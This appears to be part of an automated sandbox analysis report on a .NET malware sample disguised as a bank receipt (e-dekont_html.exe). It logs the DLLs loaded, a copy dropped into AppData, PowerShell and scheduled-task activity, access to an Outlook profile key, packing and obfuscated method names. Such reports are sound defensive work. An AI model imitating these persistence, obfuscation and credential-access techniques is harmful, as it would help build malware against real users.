                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: rasman.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: rtutils.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: winnsi.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: secur32.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: schannel.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: ncryptsslp.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeSection loaded: dpapi.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\e-dekont_html.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: e-dekont_html.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: e-dekont_html.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: e-dekont_html.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: bbvK.pdbSHA256 source: e-dekont_html.exe, fahKSvwo.exe.0.dr
                Source: Binary string: bbvK.pdb source: e-dekont_html.exe, fahKSvwo.exe.0.dr

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, HeTSatuh0uWI5PMcPt.cs.Net Code: VkBiqP4YpLfsTOKK1C5 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, HeTSatuh0uWI5PMcPt.cs.Net Code: VkBiqP4YpLfsTOKK1C5 System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_012BF228 push ebx; retn 0002h0_2_012BF242
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_012BF2BF push edi; retn 0002h0_2_012BF2CA
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_012BF2B0 push esi; retn 0002h0_2_012BF2BA
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_08F0EAB0 push ss; ret 0_2_08F0EABA
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 0_2_08F0BA7F push eax; retf 0_2_08F0BAA5
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 8_2_02BE9C30 push esp; retf 02C7h8_2_02BE9D55
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeCode function: 13_2_01599C30 push esp; retf 015Bh13_2_01599D55
                Source: e-dekont_html.exeStatic PE information: section name: .text entropy: 7.952098121903517
                Source: fahKSvwo.exe.0.drStatic PE information: section name: .text entropy: 7.952098121903517
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, WwWQAaqqrVa5qkcNhnJ.csHigh entropy of concatenated method names: 'aEoj4vB4IJ', 'tbpjzF9BZI', 'm4yfZ8ojyk', 'fP9f3wxYAm', 'y3GfIP9Pdc', 'DWWfgOjR96', 'RIRfcMcAio', 'n34fnOvjL7', 'HXefLwr00R', 'N13f0AJEjN'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, PeiRoUhVi14ZtfH37r.csHigh entropy of concatenated method names: 'BirwYxR4D8', 'WgZwsYymM4', 'ToString', 'WrkwLrT3si', 'C55w0VtyhE', 'NacwRcRLcu', 'RYKw1NfMO2', 'r9AwNRcqdf', 'pEgwasgbX4', 'swqwW7Wi3l'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, T7geawTVduRubgjl6k.csHigh entropy of concatenated method names: 'ToString', 'N2NOG0wHr7', 'LOmO5h582G', 'DuUOqyefj7', 'wjXOT2awq5', 'op7OVOxGbF', 'R5tOE9G6ju', 'qNkOdBl6WV', 'zjROk8pXXV', 'bUxOpW0eQg'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, Mx1CEBI3fhAT2luVA2.csHigh entropy of concatenated method names: 'VhWhU39LZp', 'SZPhwVoH4F', 'w4QhhuSOi4', 'ouyhf0VOQf', 'ihUhQY1v87', 'V1fhHnPIh9', 'Dispose', 'fRj9LPGTwo', 'ePJ90Cbvy0', 'sFG9RkXdBd'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, gAT7eoJMygn6gjWsIx.csHigh entropy of concatenated method names: 'aUo0C06IhH', 'N6R0J6ALlI', 'zVZ0tbc8Vc', 'rYD0S9p8Ti', 'gR90KplyIY', 'XS10x8J3uy', 'Gpk0oa0Dkc', 'FOb07Xngpj', 'aUs0iv8bjl', 'Bur04DrePt'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, HeTSatuh0uWI5PMcPt.csHigh entropy of concatenated method names: 'Yh0gnuxnxb', 'DMJgLUJSvT', 'mhrg06qPKL', 'W8FgRPVdo1', 'jeKg1NpI80', 'oexgNeeEIY', 'wOsgaITM1u', 'tBEgWQYZsa', 'MOhg8f4SGa', 'Gr7gYmIXUp'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, cGA342shoG3dnMmo4W.csHigh entropy of concatenated method names: 'fUOw78v1fh', 'RNHw46ghuh', 'wvd9ZomAx4', 'RXq93d8Z3R', 'YLnwGujPHR', 'Gf9wbAiHBb', 's7OwuAwIV8', 'Sw6wCn6Etw', 'QmpwJJnC73', 'gRhwtfNPSK'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, lovJ0czClo5OP1EZ5p.csHigh entropy of concatenated method names: 'EvQjMENxho', 'NXMjrXYoR6', 'WcvjB7Mo8C', 'jUyjlfv20k', 'UZGj5hOnPC', 'BaojT1hka6', 'NutjVt2u5h', 'YGxjHcj8Nr', 'NdPjD7cDDf', 'matjyMws2t'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, tMpAMrZVOPEtwJuQTS.csHigh entropy of concatenated method names: 'RymNntqYrb', 'zJtN0YWdsf', 'tB0N1IjBCV', 'PwPNa6ZKF4', 'CxmNWe8cvj', 'tRH1KPMfdV', 'pZm1x1MgL1', 'p4l1oDGHeM', 'W4417ff7FA', 'pZT1iG8Ejj'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, y2xvJk7MqDGjCSRLHi.csHigh entropy of concatenated method names: 't973aZA8OM', 'WP83WJIG5m', 'nA13YsO076', 'ESU3s8TwAm', 'GPc3U3QTsk', 'l6t3OVWisM', 'j1oqxVG2dtRxF1TQY5', 'OPESoh54pRnUVMRmS5', 'kfN33KKK2G', 'gMF3gsyxxw'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, VbMlbdf1ymu5YPDwdh.csHigh entropy of concatenated method names: 'BKfAM5Ilg', 'MYi6OFBF2', 'OYHMla2fb', 'xg3FEeNsq', 'lgIBXVH8y', 'BMFmk52Nl', 'LaVSSSpUpJxc5XEJyb', 'fGsfPoM0NpdrLOHYIK', 'd459hmf7r', 'LnKj5QRNo'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, nNUAPLSS6OVAMReiLp.csHigh entropy of concatenated method names: 'nSGaDPOPmG', 'n2caypalRO', 'HfBaAaZxd1', 'PeIa6xtE7a', 'Qr3aPpmRJE', 'nQVaM75VCy', 'agIaFcaQ80', 'QW6ar8INMp', 'SeaaBk8JpB', 'mFSamxaHWi'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, qWBbWjHPNSm3x3ymNh.csHigh entropy of concatenated method names: 'oiSR6kVV8l', 'rOPRMq5hBW', 'lMtRrE7Srf', 'PaERBVW4DW', 'FACRUq0pIv', 'QD9ROdqwFD', 'lbVRwFhUJG', 'f4xR9SYjSD', 'HWXRhAxHn6', 'tXORj0DbvO'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, OktkoHOIC8r5JCWFWx.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'I6qIisSfio', 'CfXI4ZYj7P', 'lsaIzh6iWn', 'OGEgZqGbqB', 'NPGg3IQ8Yp', 'xXDgIkJQKy', 'weUggWJXBM', 'LtfdsT4bbJRtGbTDNe9'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, pu7Lw9pOUtJRgB67V4.csHigh entropy of concatenated method names: 'YQvUXvU4Dc', 'bTBUbwPr7S', 'k0ZUCOd5f8', 'Pg9UJTjZPO', 'jY9U5k9GMG', 'fyLUqaZ7Xg', 'yNbUTXsSfK', 'XmdUVJa98e', 'gq8UE9w6IF', 'cXSUd5s6OI'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, Pe0SkjXKZwcNC8GV5H.csHigh entropy of concatenated method names: 'uMZaLKWh9d', 'c8waRCi1df', 'GoGaNSDvbS', 'NakN46s9ti', 'kuQNzBUL1d', 'e4ZaZfSYa1', 'z0ua3br3H9', 'gP6aIwv9Nu', 'FS2agyaaEN', 'Y5oac3Z7n6'
